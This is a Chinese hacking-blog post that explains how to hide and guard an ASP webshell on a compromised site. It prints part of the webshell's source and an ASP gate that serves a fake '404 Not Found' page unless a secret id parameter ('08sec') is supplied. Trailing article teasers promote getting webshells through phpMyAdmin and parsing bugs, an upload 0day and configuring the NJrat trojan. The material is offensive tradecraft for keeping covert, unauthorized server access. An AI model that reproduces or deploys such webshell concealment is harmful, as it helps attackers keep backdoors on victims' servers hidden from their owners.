另类隐藏保护asp大马地址 ***

hacker5年前黑客文章782

我们首先以一个大马为例这个大马是没有密码的,只要知道地址就可以进去了

或者你的大马有密码但是被人为添加了后门,但比较隐秘,完全清除很难,我们就可以用下列 *** 来进行处理。

如何加上密码让他人进不来呢?

有些人直接加个登陆界面,人家一看就知道这是大马,还可以猜密码,我的 *** 就与众不同

首先我们来看看他的一部分源码

<%

'pue=true

On Error Resume Next

server.scripttimeout=600

UserPass="login"

response.buffer = true

Response.Expires = -1

Session.Timeout=60

Const wwj="NET WORK SYSTEM"

Const jlt="WEB TESTER'S SYSTEM"

Const oqk="zxp|cyk|dez|bki|ooc|che|koc|zbk|cxa|slf|ysi|azp|bdv|tempfile|zlc|miv|gez|kmt|sqdb|kbsl|newf"

Const pnf=true

Const rfd=33

Const yqo="d *** fk"

Const kuf="GB2312"

Const gco="_"

Const fgb="want_pre.asp"

Const righthz="_request_send_sumbit_include_reel_open_form_month_data"

public br,pbwell,juppath,foldermax,maxpath

foldermax=0

dim login,gem,jdu,kyj,ttg,cl,ghq,cey,zxp,cqo,iax,udo,cyk,dez,bki,jqj,tio,jki,nyr,glm,xnr,vnm,pue,zoi,ulz,jsr,gtu,qdr,yqc,ooc,bvn,khd,che,koc,zbk,cxa,slf,ysi,irs,sxi,bin,azp,bdv,wld,ovy,nqv,T1,ito,dqc,eaz,bia,uyy,yjd,xur,nld,zlc,miv,gez,kmt,ouc,rxg,amm,xbd,vuj,dov,ysv,mt,znk,boo,opy,moi,ddo,okCPU,iak,clw,bpx,akh,cgh,ouo,etz,uvt,alr,zpq,pfv,tlk,nrp,zni,ypd,nww,rrt,boq,lqo,gsh,eyq,ifp,afc,pgh,cen,lsv,tag,zhx,eza,ydo,tfv,uxo,fbp,mct,znz

jki= Clng("&H0")

for i=0 to 12

cqo=cqo&"#"&right("000000"&trim(hex(jki)),6)&","

jki=jki+1118481

next

colors=cqo&"#FFFFFF,#f44444,#00FF00,#f00000"

cl=split(colors,",")

怎样进行处理呢?

我在前面加上了

 

<%

if request("id")="08sec" then

session("ISUSER00")= "TRUE"

end if

%>

<%

If Session("ISUSER00") = "" Then

response.write("<html><body><h1> HTTP/1.1 404 Not Found</h1></body></html>")

Response.End

end if

%>

这段代码的意思是

如果返回的id是08sec的话就添加一个session isuser00的值为true

如果Session("ISUSER00")的值为空显示HTTP/1.1 404 Not Found

如果不是就执行下面的代码

所以我们的大马就被保护起来了

效果如下:

标签: 黑客技术

相关文章

专用工具完全免费使用方法

专用工具完全免费使用方法

什么叫Beef? 电脑浏览器开发框架(Beef)是另一个很好的热门专业安全工器具。该专用工具将为网站渗透测试员发展技术性出示工作经验,与别的专用工具不一样,Beef致力于运用电脑浏览器系统漏洞来查验...

nginx&IIS7.0&IIS7.5+php解析拿webshell

上传地址:http://chncto.com/bluesword/blue_sword.php?t=t_upload&Action=PostMsg 已使用解析拿下shell。...

美工及程序设计:金站网·通易建站 0day

美工及程序设计:金站网·通易建站 0day

关键字:美工及程序设计:金站网·通易建站 漏洞上传:/UpFileForm.asp(在域名后加上) 讲解下burp截断吧 先代理本地ip burp截断...

利用phpMyAdmin拿webshell

首先用暴路径漏洞找到绝对路径,然后替换下面的路径 随便选个数据库,然后执行以下的sql(利用sql命令导出一个shell) Create TABLE a (cmd text NOT N...

NJrat木马病毒如何配置?

NJrat木马病毒如何配置?

不久前,有一个事在新浪微博特火的,一名程序猿用了一款姓名叫NJrat的木马病毒反控制了互联网诈骗犯。   用木马病毒来基础学习网络黑客专业知识,会让许多新手有兴趣爱好。 但是许多新手在检测...

Nmap是用以端口扫描器,服务项目检验,乃至是漏洞检测等多种

Nmap是用以端口扫描器,服务项目检验,乃至是漏洞检测等多种

Nmap是用以端口扫描器,服务项目检验,乃至是漏洞检测等多种多样作用的强劲专用工具。Nmap从新手入门到高級遮盖了很多基本的定义和指令,在本文的第二一部分,我将谈及Nmap一些高級的技术性。 &nb...